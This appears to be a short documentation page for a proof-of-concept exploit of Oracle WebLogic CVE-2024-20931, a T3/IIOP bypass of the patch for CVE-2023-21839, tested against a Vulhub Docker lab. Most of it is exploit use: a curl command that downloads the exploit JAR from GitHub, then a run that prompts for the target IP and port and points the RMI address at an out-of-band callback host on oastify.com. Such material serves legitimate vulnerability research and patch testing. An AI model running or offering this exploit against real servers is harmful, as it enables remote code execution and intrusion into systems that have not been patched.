WebLogic - CVE-2024-20931
CVE-2024-20931, is built to bypass the patch Oracle made for CVE-2023-21839. In other words, this is just another T3/IIOP exploit of WebLogic.
Project is based on the findings of GlassyAmadeus.
Proof-of-Concept
VulnHub 12.2.1.3
apt :: ~ » docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
4c1bbd132119 vulhub/weblogic:12.2.1.3 "/u01/oracle/createA…" 2 days ago Up About an hour 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp weblogic-vulnhub-12213[oracle@weblogic-vulnhub-12213 exp]$ curl -OL https://github.com/0xPThree/WebLogic/raw/refs/heads/main/cve-2024-20931/CVE-2024-20931.jar
[oracle@weblogic-vulnhub-12213 exp]$ java -jar CVE-2024-20931.jar
Please input target IP:127.0.0.1
Please input target port:7001
Please input RMI Address(ip:port/exp):4diumyg78d3drm2y405khl71xs3jraky9.oastify.com
Source code
Last updated
Was this helpful?